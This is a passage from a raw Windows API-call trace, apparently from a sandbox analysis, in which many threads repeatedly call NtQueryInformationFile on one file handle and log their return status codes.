FileInformation=0x44d8098) returned 0x0 Thread: id = 2023 os_tid = 0x9c4 [0155.105] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfee0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfee0, FileInformation=0x44d8098) returned 0x0 Thread: id = 2024 os_tid = 0xa6c [0155.107] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fb48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fb48, FileInformation=0x44d8098) returned 0x0 Thread: id = 2025 os_tid = 0xb00 [0155.108] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffe90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffe90, FileInformation=0x44d8098) returned 0x0 Thread: id = 2026 os_tid = 0xaf8 [0155.110] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff8a8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff8a8, FileInformation=0x44d8098) returned 0x0 Thread: id = 2027 os_tid = 0xae4 [0155.114] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfb20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfb20, FileInformation=0x44d8098) returned 0x0 Thread: id = 2028 os_tid = 0x344 [0155.115] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fca0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fca0, FileInformation=0x44d8098) returned 0x0 Thread: id = 2029 os_tid = 0x808 [0155.117] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487ff70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487ff70, FileInformation=0x44d8098) returned 0x0 Thread: id = 2030 os_tid = 0x858 [0155.119] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef948, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef948, FileInformation=0x44d8098) returned 0x0 Thread: id = 2031 os_tid = 0x224 [0155.120] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fea8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fea8, FileInformation=0x44d8098) returned 0x0 Thread: id = 2032 os_tid = 0x4dc [0155.122] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f890, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f890, FileInformation=0x44d8098) returned 0x0 Thread: id = 2033 os_tid = 0x78c [0155.124] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efe70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efe70, FileInformation=0x44d8098) returned 0x0 Thread: id = 2034 os_tid = 0xb0 [0155.126] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fd08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fd08, FileInformation=0x44d8098) returned 0x0 Thread: id = 2035 os_tid = 0x314 [0155.128] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fa58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fa58, FileInformation=0x44d8098) returned 0x0 Thread: id = 2036 os_tid = 0x804 [0155.129] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483ff30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483ff30, FileInformation=0x44d8098) returned 0x0 Thread: id = 2037 os_tid = 0x854 [0155.131] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfa60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfa60, FileInformation=0x44d8098) returned 0x0 Thread: id = 2038 os_tid = 0xa78 [0155.134] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fb50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fb50, FileInformation=0x44d8098) returned 0x0 Thread: id = 2039 os_tid = 0x7a8 [0155.136] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfa70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfa70, FileInformation=0x44d8098) returned 0x0 Thread: id = 2040 os_tid = 0x330 [0155.137] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483ff28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483ff28, FileInformation=0x44d8098) returned 0x0 Thread: id = 2041 os_tid = 0x3a4 [0155.139] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x299ff38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x299ff38, FileInformation=0x44d8098) returned 0x0 Thread: id = 2042 os_tid = 0x67c [0155.141] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fbe8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fbe8, FileInformation=0x44d8098) returned 0x0 Thread: id = 2043 os_tid = 0x5cc [0155.142] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fc80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fc80, FileInformation=0x44d8098) returned 0x0 Thread: id = 2044 os_tid = 0x840 [0155.144] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef870, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef870, FileInformation=0x44d8098) returned 0x0 Thread: id = 2045 os_tid = 0x69c [0155.145] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fd88, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fd88, FileInformation=0x44d8098) returned 0x0 Thread: id = 2046 os_tid = 0x6f0 [0155.147] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfd38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfd38, FileInformation=0x44d8098) returned 0x0 Thread: id = 2047 os_tid = 0x810 [0155.149] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fb08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fb08, FileInformation=0x44d8098) returned 0x0 Thread: id = 2048 os_tid = 0xa88 [0155.152] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fbb0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fbb0, FileInformation=0x44d8098) returned 0x0 Thread: id = 2049 os_tid = 0x43c [0155.154] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x297f990, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x297f990, FileInformation=0x44d8098) returned 0x0 Thread: id = 2050 os_tid = 0x670 [0155.156] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bf868, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bf868, FileInformation=0x44d8098) returned 0x0 Thread: id = 2051 os_tid = 0xa14 [0155.159] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f948, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f948, FileInformation=0x44d8098) returned 0x0 Thread: id = 2052 os_tid = 0x990 [0155.160] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffeb8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffeb8, FileInformation=0x44d8098) returned 0x0 Thread: id = 2053 os_tid = 0x2dc [0155.162] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fdf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fdf0, FileInformation=0x44d8098) returned 0x0 Thread: id = 2054 os_tid = 0x74c [0155.163] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef8b8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef8b8, FileInformation=0x44d8098) returned 0x0 Thread: id = 2055 os_tid = 0x3c4 [0155.165] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffc80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffc80, FileInformation=0x44d8098) returned 0x0 Thread: id = 2056 os_tid = 0x90 [0155.166] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fec0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fec0, FileInformation=0x44d8098) returned 0x0 Thread: id = 2057 os_tid = 0x630 [0155.168] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fe20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fe20, FileInformation=0x44d8098) returned 0x0 Thread: id = 2058 os_tid = 0x124 [0155.170] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f8a8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f8a8, FileInformation=0x44d8098) returned 0x0 Thread: id = 2059 os_tid = 0xc0 [0155.173] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fd98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fd98, FileInformation=0x44d8098) returned 0x0 Thread: id = 2060 os_tid = 0x360 [0155.175] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489f910, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489f910, FileInformation=0x44d8098) returned 0x0 Thread: id = 2061 os_tid = 0x920 [0155.176] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x299fd90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x299fd90, FileInformation=0x44d8098) returned 0x0 Thread: id = 2062 os_tid = 0xbec [0155.178] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffe38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffe38, FileInformation=0x44d8098) returned 0x0 Thread: id = 2063 os_tid = 0x6b8 [0155.179] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fc50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fc50, FileInformation=0x44d8098) returned 0x0 Thread: id = 2064 os_tid = 0x30c [0155.181] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489ff80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489ff80, FileInformation=0x44d8098) returned 0x0 Thread: id = 2065 os_tid = 0xbfc [0155.183] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bf998, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bf998, FileInformation=0x44d8098) returned 0x0 Thread: id = 2066 os_tid = 0x3f8 [0155.184] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fc70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fc70, FileInformation=0x44d8098) returned 0x0 Thread: id = 2067 os_tid = 0x6cc [0155.186] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efbf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efbf0, FileInformation=0x44d8098) returned 0x0 Thread: id = 2068 os_tid = 0x830 [0155.187] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff7c0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff7c0, FileInformation=0x44d8098) returned 0x0 Thread: id = 2069 os_tid = 0x75c [0155.191] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fab0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fab0, FileInformation=0x44d8098) returned 0x0 Thread: id = 2070 os_tid = 0x7f0 [0155.193] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f828, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f828, FileInformation=0x44d8098) returned 0x0 Thread: id = 2071 os_tid = 0x710 [0155.194] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff810, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff810, FileInformation=0x44d8098) returned 0x0 Thread: id = 2072 os_tid = 0x5d8 [0155.197] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fe48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fe48, FileInformation=0x44d8098) returned 0x0 Thread: id = 2073 os_tid = 0xbe4 [0155.199] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x297fc08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x297fc08, FileInformation=0x44d8098) returned 0x0 Thread: id = 2074 os_tid = 0x600 [0155.200] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f7e8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f7e8, FileInformation=0x44d8098) returned 0x0 Thread: id = 2075 os_tid = 0xbd0 [0155.202] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff9e8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff9e8, FileInformation=0x44d8098) returned 0x0 Thread: id = 2076 os_tid = 0x158 [0155.204] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f9e8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f9e8, FileInformation=0x44d8098) returned 0x0 Thread: id = 2077 os_tid = 0xbd8 [0155.205] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fc18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fc18, FileInformation=0x44d8098) returned 0x0 Thread: id = 2078 os_tid = 0xbe8 [0155.207] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47df7a8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47df7a8, FileInformation=0x44d8098) returned 0x0 Thread: id = 2079 os_tid = 0xbdc [0155.210] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430ff08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430ff08, FileInformation=0x44d8098) returned 0x0 Thread: id = 2080 os_tid = 0x5b4 [0155.212] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efb50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efb50, FileInformation=0x44d8098) returned 0x0 Thread: id = 2081 os_tid = 0x614 [0155.213] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432ff48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432ff48, FileInformation=0x44d8098) returned 0x0 Thread: id = 2082 os_tid = 0x690 [0155.215] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff9c0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff9c0, FileInformation=0x44d8098) returned 0x0 Thread: id = 2083 os_tid = 0xa68 [0155.216] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f908, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f908, FileInformation=0x44d8098) returned 0x0 Thread: id = 2084 os_tid = 0x7d0 [0155.219] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430f970, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430f970, FileInformation=0x44d8098) returned 0x0 Thread: id = 2085 os_tid = 0x7d8 [0155.221] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fd80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fd80, FileInformation=0x44d8098) returned 0x0 Thread: id = 2086 os_tid = 0x24c [0155.223] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x299fe98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x299fe98, FileInformation=0x44d8098) returned 0x0 Thread: id = 2087 os_tid = 0x9f8 [0155.224] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fc58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fc58, FileInformation=0x44d8098) returned 0x0 Thread: id = 2088 os_tid = 0x798 [0155.232] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef9c0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef9c0, FileInformation=0x44d8098) returned 0x0 Thread: id = 2089 os_tid = 0xa3c [0155.234] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfc80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfc80, FileInformation=0x44d8098) returned 0x0 Thread: id = 2090 os_tid = 0x8c0 [0155.235] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x297feb0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x297feb0, FileInformation=0x44d8098) returned 0x0 Thread: id = 2091 os_tid = 0x700 [0155.238] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efce8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efce8, FileInformation=0x44d8098) returned 0x0 Thread: id = 2092 os_tid = 0x708 [0155.240] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fb10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fb10, FileInformation=0x44d8098) returned 0x0 Thread: id = 2093 os_tid = 0xa64 [0155.241] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fb60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fb60, FileInformation=0x44d8098) returned 0x0 Thread: id = 2094 os_tid = 0xa30 [0155.243] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffb18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffb18, FileInformation=0x44d8098) returned 0x0 Thread: id = 2095 os_tid = 0x388 [0155.245] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f9f8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f9f8, FileInformation=0x44d8098) returned 0x0 Thread: id = 2096 os_tid = 0x760 [0155.246] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fba0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fba0, FileInformation=0x44d8098) returned 0x0 Thread: id = 2097 os_tid = 0xa54 [0155.248] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434faa8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434faa8, FileInformation=0x44d8098) returned 0x0 Thread: id = 2098 os_tid = 0x738 [0155.250] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f870, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f870, FileInformation=0x44d8098) returned 0x0 Thread: id = 2099 os_tid = 0x488 [0155.253] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfc58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfc58, FileInformation=0x44d8098) returned 0x0 Thread: id = 2100 os_tid = 0x6dc [0155.255] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477ff30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477ff30, FileInformation=0x44d8098) returned 0x0 Thread: id = 2101 os_tid = 0x7a0 [0155.258] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffa38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffa38, FileInformation=0x44d8098) returned 0x0 Thread: id = 2102 os_tid = 0x73c [0155.259] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fd10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fd10, FileInformation=0x44d8098) returned 0x0 Thread: id = 2103 os_tid = 0x1c0 [0155.261] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fe28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fe28, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 2104 os_tid = 0x7c4 [0155.263] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fe40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fe40, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 2105 os_tid = 0x790 [0155.264] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfb98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfb98, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 2106 os_tid = 0x688 [0155.266] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42eff30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42eff30, FileInformation=0x44d8098) returned 0x0 Thread: id = 2107 os_tid = 0x240 [0155.267] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fa18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fa18, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 2108 os_tid = 0x8e0 [0155.270] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bf820, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bf820, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 2109 os_tid = 0x880 [0155.272] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fca0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fca0, FileInformation=0x44d8098) returned 0x0 Thread: id = 2110 os_tid = 0x8f0 [0155.274] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489ff00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489ff00, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 2111 os_tid = 0xa18 [0155.276] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x299fc90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x299fc90, FileInformation=0x44d8098) returned 0x0 Thread: id = 2112 os_tid = 0x8a0 [0155.278] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fa90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fa90, FileInformation=0x44d8098) returned 0x0 Thread: id = 2113 os_tid = 0x870 [0155.280] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fc90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fc90, FileInformation=0x44d8098) returned 0x0 Thread: id = 2114 os_tid = 0x2c4 [0155.282] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x299fa20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x299fa20, FileInformation=0x44d8098) returned 0x0 Thread: id = 2115 os_tid = 0x890 [0155.283] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fd60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fd60, FileInformation=0x44d8098) returned 0x0 Thread: id = 2116 os_tid = 0x4e8 [0155.285] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fe08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fe08, FileInformation=0x44d8098) returned 0x0 Thread: id = 2117 os_tid = 0xcc [0155.288] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfb90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfb90, FileInformation=0x44d8098) returned 0x0 Thread: id = 2118 os_tid = 0xd0 [0155.289] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fb58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fb58, FileInformation=0x44d8098) returned 0x0 Thread: id = 2119 os_tid = 0xd4 [0155.291] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efb20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efb20, FileInformation=0x44d8098) returned 0x0 Thread: id = 2120 os_tid = 0xd8 [0155.293] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfba0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfba0, FileInformation=0x44d8098) returned 0x0 Thread: id = 2121 os_tid = 0xdc [0155.296] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfed0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfed0, FileInformation=0x44d8098) returned 0x0 Thread: id = 2122 os_tid = 0xe0 [0155.297] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434f978, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434f978, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 2123 os_tid = 0xe4 [0155.299] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fab0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fab0, FileInformation=0x44d8098) returned 0x0 Thread: id = 2124 os_tid = 0xe8 [0155.300] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x297fd58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x297fd58, FileInformation=0x44d8098) returned 0x0 Thread: id = 2125 os_tid = 0xec [0155.302] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efeb8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efeb8, FileInformation=0x44d8098) returned 0x0 Thread: id = 2126 os_tid = 0x748 [0155.305] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfe68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfe68, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 2127 os_tid = 0xc4 [0155.307] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bf8d0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bf8d0, FileInformation=0x44d8098) returned 0x0 Thread: id = 2128 os_tid = 0x620 [0155.309] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f990, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f990, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 2129 os_tid = 0x910 [0155.310] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fca0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fca0, FileInformation=0x44d8098) returned 0x0 Thread: id = 2130 os_tid = 0x950 [0155.312] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fa30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fa30, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 